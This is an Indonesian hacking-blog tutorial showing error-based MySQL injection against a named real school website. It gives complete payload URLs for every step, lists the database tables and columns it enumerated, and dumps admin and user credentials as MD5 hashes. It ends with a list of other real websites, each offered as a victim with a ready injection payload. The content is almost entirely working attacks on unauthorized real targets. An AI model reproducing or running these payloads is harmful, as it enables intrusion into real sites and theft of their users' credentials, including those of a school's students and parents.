exploit web "planet kidz" with MYSQL Injection Error Based

 


[ SQL Injection Error Based ]

target: http://www.planetkidz.co.id/matara1/news_home.php?no_id=29
author: X'1N73CT

[ tester ]

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29'
hasil:
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''29''' at line 1

error yg paling senangi ini dimana kita bisa bypass lewat hackbar tanpa capek2 pakai order by

[ mencari jumlah kolom ]

jika error nya begitu kita bisa bypass menguunakan perinah group by
paki hackbar tentunya

klik SQL => union select statement => ketik angka 50 atau 100 atau lebih heheheh => enter
lalu ganti union select dengan group by sehingga menjadi

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29 group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--

webnya normal , kmungkinan nya ada 2 yakni kolom lebih dari 50 atau di proteksi sama adminnya
kita pastiin dengan menambahkan tanda ' dan +-
sehinga menjadi

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--+-

hasil:
1054 : Unknown column '7' in 'group statement'
ini berarti kolom 7 tidak ada jadi hanya ada 6 kolom

[ mencari angka injeksi ]

dengan cara menganti perintah group by dengan union select lalu di ikuti jumlah kolom yg ditmukan tadi
sehingga menjadi:

http://www.planetkidz.co.id/matara1/news_home.php?no_id=-29' union select 1,2,3,4,5,6--+-

hasil:
1222 : The used SELECT statements have a different number of columns

masih ingat tutorial xpath injektion untuk menangani ini
tp terkadang ada web yg mendisable perintah extravalue() yg kita gunakan di xpath
nah solasi eh solusinya adalah dengan cara error based
(sqli dengan memanfaatkan error) ^_^

langsung saja

[ mencari version ]

dengan perintah

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1


sehingga menjadi
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+-

hasil:
1062 : Duplicate entry '5.0.96-community:1' for key 1
ok kita dapat versinya lanjuutt

[ mencari tabel ]
kita buka dengan perintah

and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

sehingga menjadi:

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'calendar_cat <~1' for key 1


untuk mengetahui tabel2 lainnya yaitu dengan cara merubah perintah limit 0,1 menjadi limit 1,1 lalu limit 2,1 dan seterusnya
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'calendar_events <~1' for key 1


http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'calendar_param <~1' for key 1


http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'calendar_users <~1' for key 1


http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'msy_berita <~1' for key 1


http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'msy_userprofile <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'new_ortu <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'nilai_siswa <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 8,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'sekolah <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 9,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'siswa <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
web kembali normal wahh berarti hasilnya cuma di atas ^_^ ok kita buka kolomnya ^_^

lanjuutt

[ buka kolom ]
cara membuka kolom nya ada lah dengan cara menambahkan perintah di bawah ini
and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
0x6d73795f7573657270726f66696c65 <~ hexa dari msy_userprofile
sehingga menjadi:
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'ProfileID <~1' for key 1

kembali kita mainan limit untuk melihat nama2 kolomnya ^_^

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'DateCreated <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'LastLogin <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'Username <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'Password <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'Name <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'Address <~1' for key 1

dan seterusnya

[ buka data kolom ]
kita coba buka data di kolom username dan password
dengan perintah

and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

sehingga menjadi

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'admin:827ccb0eea8a706c4c34a16891f84e7b <~1' for key 1
hohoho xixi dapat hehehehehe

lanjutt kita mainkan limit ^_^
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'suwar:827ccb0eea8a706c4c34a16891f84e7b <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
hasil:
1062 : Duplicate entry 'riri:86ae0211818cfc618f8c84433a433467 <~1' for key 1

dan seterusnya :)
sekian tutor dari saya semoga bermanfaat

salam dari saya

X'1N73CT

monggo buat korban tutorial :v

http://www.p42.pl/galeria_detail.php?id=175 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
http://calkiewicz.com/galeria_detail.php?id=30&idm=6 or 1 /*!group by*/ concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
http://www.psychologistsseattle.com/profileDetail.php?id=96 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
http://www.greater-seattle-allied-therapists-and-counseling.com/profileDetail.php?id=100 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
http://www.accordassociates.com/profileDetail.php?id=17 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
http://www.alancristea.com/bookshop.php?cat=-41 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
http://www.affordablesound.com/productlist.php?id=5 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
http://www.mikeandthebike.com/store_details.php?ID=6 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
http://www.ban-tawai.com/product.php?cid=50 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
http://jeyechandranstore.com/product_list.php?id=7' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
http://www.lcdtvbuyingguide.com.au/prod_details.php?products_id=169 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
http://jerichoelectronics.net/proddetails.php?id=49 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
http://www.bonastar.com.au/prodDetails.php?id_prd=630 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-

Next
Prev Post
Previous
Next Post
Unknown

About Unknown

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim venenatis fermentum mollis in porta et nibh.

No comments:
Write komentar

Pengunjung Yang Baik Adalah Pengunjung Sering Berkomentar Pada Suatu Blog Yang Di Kunjunginya...

Labels

Join Our Email Newsletter
© Copyright 2016 Blogz-Udin | Sharing Ilmu Tentang IT. Designed by Bloggertheme9. Powered by Blogger.